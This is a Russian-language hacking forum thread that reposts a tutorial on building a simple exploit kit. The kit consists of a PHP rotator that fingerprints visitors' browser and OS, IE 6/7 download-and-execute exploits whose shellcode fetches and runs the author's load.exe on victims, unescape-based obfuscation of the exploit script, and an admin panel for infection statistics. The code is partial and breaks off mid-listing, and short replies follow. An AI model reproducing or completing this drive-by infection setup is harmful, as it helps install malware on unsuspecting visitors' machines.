Уважаемые пользователи форума, убедительно просим вас переходить в телеграмм продавца, исключительно по предоставленной ссылке. Проверяйте продавца, отправив сообщение на электронную почту, чтобы убедиться в том, что вы общаетесь действительно с ним.

Пишем простейшую связку эксплоитов

Тема в разделе "Хакинг. Программирование", создана пользователем ohotnik, 6 окт 2016.

  1. ohotnik

    ohotnik Member

    Сообщения:
    183
    Симпатии:
    0
    статья не моя старенькая может кому будет интересно для изучения.
    1. Intro.
    Что такое эксплоит. Эксплоит (exploit — использовать) - фрагмент программного кода, который, используя возможности предоставляемые ошибкой, отказом или уязвимостью, ведет к повышению привелегий, отказу в обслуживании или выполнению произвольного кода.
    Есть разные типы эксплоитов: local, remote, dos и тп, мы же будем использовать remote-эксплоиты.
    Выбирать мы будем эксплоиты по типу remotedownload and execution fileIE 6/7...То есть эксплоиты, которые позволяют через определенную уязвимость браузеров Internet explorer 6 и 7 загрузить и выполнить наш файл в системе.
    Что такое связка-эксплоитов. Связка эксплоитов - набор эксплоитов, выдающихся ротатором. Задача ротатора - определить всевозможное ПО на машине жертвы и подобрать подходящий эксплоит. Стандарнтое строение связки:
    Ротатор.
    Эксплоиты.
    Загружаемый файл.
    Статистика.
    Админ-панель.
    Наиболее популярные паблик(общедоступные, доступные простым смертным) это Ice-Pack, Armitage[beta], G-pack и тп.
    Почему мы будем выберать эксплоиты под IE? - Т.к. мы будем писать простейшую связку-эксплоитов, мы не будем рассматривать примеры более навороченных связок, эксплоиты под различные ОСи, браузеры, явамашины, сторонний софт типа Adobedjvu-readeroвetc...После почтения статьи, вам не составит труда добавить другие эксплоиты и тд.
    Наверняка у вас завалялсо какой-нибудь эксп, и вы в нем видите немного непонятные строки, типа такого:
    Code:
    %uC933%uE983%uD9A9%uD9EE%u2474%u5BF4%u7381%u5713​

    Выше приведен кусок шелл-кода(shellcode).
    Что такое шеллкоды. Шелл-код - это двоичный исполняемый код, который обычно передаёт управление консоли, например /bin/sh Unix shell, command.com в MS-DOS и cmd.exe в операционных системах Microsoft Windows. Код оболочки может быть использован как полезная нагрузка эксплойта, обеспечивая взломщику доступ к командной оболочке (англ. shell) в компьютерной системе(взято с вики).
    Мы же будем использовать шеллкод в следующей схеме: загрузка эксплоита - при успешном пробиве передается управление шеллкоду - шеллкод загружает и исполняет наш исходный файл.
    Теперь, когда мы разобрались с используемыми понятиями, можно переходить к следующему пункту...

    2. С чего начинаем.
    Для начала, составим схему нашей будущей мег0-связки)
    Ротатор - скрипт будет определять ОСь, Браузер, Версию браузера, Уникальность посетителя, Айпи адрес, записывать полученные данные в бд и выдавать подходящий эксплоит. Назовем файл index.php
    Файлы бд. - Обычно в связках эксплоитов используют mysql базы данных, но тк мы пишем простую связку, мы обойдемся и без них. Все будем писать в лог-файлы.
    Файлфайлы эксплоитов - используемые эксплоиты, которые будет выдовать ротатор - файлы, содержащие наш вредоносный js-код. Назовем файл spl.php
    Скрипт выдачи файла - так как нам нужно вести статистику загрузок файла, мы будем использовать скрипт, который будет писать в лог если к файлу было обращение, ну и выдовать этот файл.Назовем файл load.php. Разумеется такой способ сбора статистики пробитых машин не очень то и верен, мы будем использовать 2 вида подсчета загрузок: через скрипт и через наш файл.
    Наш файл - exe-файл, который мы будем грузить жертвам ^^ Назовем файл load.exe
    Админ-панель - какая же связка без 0дминки? Мы сделаем себе простенькую админку, чтоб нам было удобно просматривать статистику и результаты...управлять статистикой и тп...Назовем файл admin.php
    Определились со схемой, можно приступать к заготовке материалов=)
    Подбираем эксплоиты...Где их взять? Рекомендую искать свежие и не только экспы на сайтах:
    и
    Требования к эксплоитам указанны в п.1, но если вы пропустили и вам лень возвращаться, напомню: remotedownload and executionIE 6-7 ... Много не набирайте, мы же только учимся - 3-6 хватит...
    Готово? - двигаемсо дальше...
    Что там потребуется:
    Мозг.
    Прямые руки.
    Текстовый редактор.
    То, на чем фсе будем тестить, если вам не фпадло, можете каждый раз заливать фсе на хостинг с поддержкой пхп, но йа рекомендую поставить себе простенькую и легкую программу USBWebServer - программа содержит в себе апачphpmysql и не требует установки, вес запакованного дистра - 12-14мб...так что проблем с программой не возникнет.
    Когда у нас фсе готово, можно приступать к подготовке эксплоитов.
    Открываем эксп в тектовом редакторе, ищем в js-коде переменную типа var shellcodescode в таком духе, нашли? теперь нам нужно заменить на наш шеллкод...где взять шеллкод? - здесь несколько вариантов, скачать генератор шеллкодов, найти не проблема, скачать уже готовый шелл-код, подыскать материал по написанию шеллкодов и написать самому...выберать вам...
    Шеллкоду мы будем указывать файл load.php ...
    Теперь, когда шеллкод прикручен к сплоиенту, спрячим немного наш сплоит...
    Выделяем оставшуюся часть кода, закидываем в url-encoder - найти не проблема, есть онлайнехешныеетц...
    Теперь у нас получилось что-то на подобии следующего кода...
    Code:
    %58%59%59%59%59%59%59​

    Теперь заменим этот код на следующий:
    Code:
    document.write(unescape(%58%59%59%59%59%59%59));​

    В сумме у нас получается примерно следующий эксплоит:
    Code:
    <script>
    var shellcode = шеллкод;
    document.write(unescape(%58%59%59%59%59%59%59));
    </script>​

    Эксплоит готов! Можно открывать баночку пива)
    Переходим к следующей части нашего мег0-пака - Ротатор.
    Для начала, нам нужно определить версию браузера и оси пользователя а так же его айпи адрес...
    Браузер и ось мы будем мы все определять за счет строковых функций.
    Code:
    $ip = $_SERVER[REMOTE_ADDR]; //IP-адрес
    /*Определяем браузер*/
    $user_agent = getenv(HTTP_USER_AGENT); //Получаем user-agenta передаваемого браузером.
    if (eregi((opera) ([0-9]{1,2}.[0-9]{1,3}){0,1}, $user_agent, $vers) or
    eregi((opera/)([0-9]{1,2}.[0-9]{1,3}){0,1}, $user_agent, $vers)) /*ищем в нем название браузера и версию, если найден, присваиваем переменной значения и таг же везде в следующих строках*/
    {$typs= Opera;
    $browser = Opera . . $vers[2];}
    elseif (eregi((konqueror)/([0-9]{1,2}.[0-9]{1,3}), $user_agent, $vers))
    {$typs= Konqueror;
    $browser = Konqueror . . $vers[2];}
    elseif (eregi((lynx)/([0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}), $user_agent, $vers))
    {$typs= Lynx;
    $browser = Lynx . . $vers[2];}
    elseif (eregi((links) (([0-9]{1,2}.[0-9]{1,3}), $user_agent, $vers))
    {$typs= Links;
    $browser = Links . . $vers[2];}
    elseif (eregi((msie) ([0-9]{1,2}.[0-9]{1,3}), $user_agent, $vers))
    {$typs= Internet Explorer;
    $browser = Internet Explorer . . $vers[2];}
    elseif (eregi((netscape6)/(6.[0-9]{1,3}), $user_agent, $vers))
    {$typs= Netscape;
    $browser = Netscape . . $vers[2];}
    elseif (eregi((firefox)/([0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}), $user_agent, $vers) or
    eregi((firefox)/([0-9]{1,2}.[0-9]{1,2}), $user_agent, $vers))
    {$typs= Firefox;
    $browser = Firefox . . $vers[2];}
    elseif (eregi((mozilla)/([0-9]{1,2}.[0-9]{1,3}), $user_agent, $vers))
    {$typs= Mozilla;
    $browser = Mozilla . . $vers[2];}
    elseif (eregi((flock), $user_agent))
    {$browser =Flock;}
    elseif (eregi((maxthon), $user_agent))
    {$browser =Maxthon;}
    elseif (eregi((chrome), $user_agent))
    {$browser =Chrome;}
    else
    {$typs= Other;
    $browser = Other;}​

    Айпи и браузер определили? Теперь определим ось
    Code:
    if (strstr($user_agent, Windows 95)) $system = Windows 95; /*везде ищем в передаваемом user-agente ось,​
  2. aka_k4

    aka_k4 Member

    Сообщения:
    338
    Симпатии:
    1
    для 2008 не плоха
  3. Caligula

    Caligula Member

    Сообщения:
    57
    Симпатии:
    0
    - хранилище эксплоитов.
    - хранилище эксплоитов, обзоры багов и тд.
    Серьезно? milw0rm.com - сайт который умер и securitylab.ru, создатель которого писал книгу про хакинг где расказывал : Выкрутим из мышки шарик, вот мы и взломали Пк

Поделиться этой страницей